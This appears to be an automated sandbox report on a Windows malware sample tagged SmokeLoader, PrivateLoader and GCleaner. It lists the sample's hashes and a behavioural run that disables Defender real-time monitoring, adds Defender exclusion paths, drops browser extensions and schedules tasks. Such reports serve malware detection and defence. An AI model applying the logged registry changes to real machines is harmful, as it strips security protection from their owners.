Malware Analysis Report

2024-11-15 09:02

Sample ID 241110-fn9vyszfln
Target 548bdfcb86652c14659e019e9f838f42
SHA256 4c1fc6a16f378978da7c35f36525a4397a983255020fb709d0ad8cbe3f1e38e5
Tags
defense_evasion discovery evasion execution spyware stealer trojan persistence vmprotect smokeloader backdoor gcleaner loader privateloader
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

4c1fc6a16f378978da7c35f36525a4397a983255020fb709d0ad8cbe3f1e38e5

Threat Level: Known bad

The file 548bdfcb86652c14659e019e9f838f42 was found to be: Known bad.

Malicious Activity Summary

defense_evasion discovery evasion execution spyware stealer trojan persistence vmprotect smokeloader backdoor gcleaner loader privateloader

Smokeloader family

Gcleaner family

Privateloader family

Modifies Windows Defender Real-time Protection settings

GCleaner

Windows security bypass

SmokeLoader

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

VMProtect packed file

Checks BIOS information in registry

Checks computer location settings

Executes dropped EXE

Loads dropped DLL

Reads user/profile data of web browsers

Indirect Command Execution

Drops Chrome extension

Legitimate hosting services abused for malware hosting/C2

Drops desktop.ini file(s)

Checks installed software on the system

Adds Run key to start application

Suspicious use of SetThreadContext

Drops file in System32 directory

Enumerates processes with tasklist

Drops file in Windows directory

Drops file in Program Files directory

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Program crash

System Network Configuration Discovery: Internet Connection Discovery

Unsigned PE

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Runs ping.exe

Suspicious use of FindShellTrayWindow

Suspicious behavior: GetForegroundWindowSpam

Checks SCSI registry key(s)

Modifies data under HKEY_USERS

Enumerates system info in registry

Suspicious use of SendNotifyMessage

Scheduled Task/Job: Scheduled Task

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-10 05:02

Signatures

Privateloader family

privateloader

VMProtect packed file

vmprotect
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral11

Detonation Overview

Submitted

2024-11-10 05:02

Reported

2024-11-10 05:05

Platform

win7-20240729-en

Max time kernel

149s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PL\setup.exe"

Signatures

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" C:\Windows\SysWOW64\reg.exe N/A

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\LsajhStaXkJRC = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\oWxSecJNU = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\eiYaNjTCbhfbMeVB = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\biwNYXhGTKCQxjLv = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\YNUWFfCEdUiU2 = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\oWxSecJNU = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\eiYaNjTCbhfbMeVB = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\biwNYXhGTKCQxjLv = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\biwNYXhGTKCQxjLv = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\LsajhStaXkJRC = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\QpigBxJgKxUn = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\biwNYXhGTKCQxjLv = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\QpigBxJgKxUn = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\YNUWFfCEdUiU2 = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS7E44.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A

Indirect Command Execution

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\forfiles.exe N/A
N/A N/A C:\Windows\SysWOW64\forfiles.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\7zS7E44.tmp\Install.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\vWebWLI.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\vWebWLI.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4FA45AE1010E09657982D8D28B3BD38E_97769FA94627046053C91C794A3C7311 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\vWebWLI.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4FA45AE1010E09657982D8D28B3BD38E_97769FA94627046053C91C794A3C7311 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_CD08734C3F770C014F2620E6CA4CE9C7 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_CD08734C3F770C014F2620E6CA4CE9C7 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
File created C:\Program Files (x86)\oWxSecJNU\rzgGdAH.xml C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
File created C:\Program Files (x86)\YNUWFfCEdUiU2\wAkOdaJtnCYpI.dll C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
File created C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR\caaUEUk.xml C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
File created C:\Program Files (x86)\YNUWFfCEdUiU2\ioOgwSz.xml C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
File created C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR\dQfGPhl.dll C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
File created C:\Program Files (x86)\LsajhStaXkJRC\nLrhEQW.dll C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
File created C:\Program Files (x86)\LsajhStaXkJRC\mbnEyUI.xml C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
File created C:\Program Files (x86)\QpigBxJgKxUn\qLlRXkU.dll C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
File created C:\Program Files (x86)\oWxSecJNU\AOatCp.dll C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\bJbhxhmwQPPePEjnjA.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\FTlmQXMDCFpnewAuq.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\zeLHdclAQOoTZxj.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\dBpreMcpfXbehynYz.job C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS7C32.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language \??\c:\windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\forfiles.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS7E44.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language \??\c:\windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language \??\c:\windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\PL\setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS7E44.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS7E44.tmp\Install.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
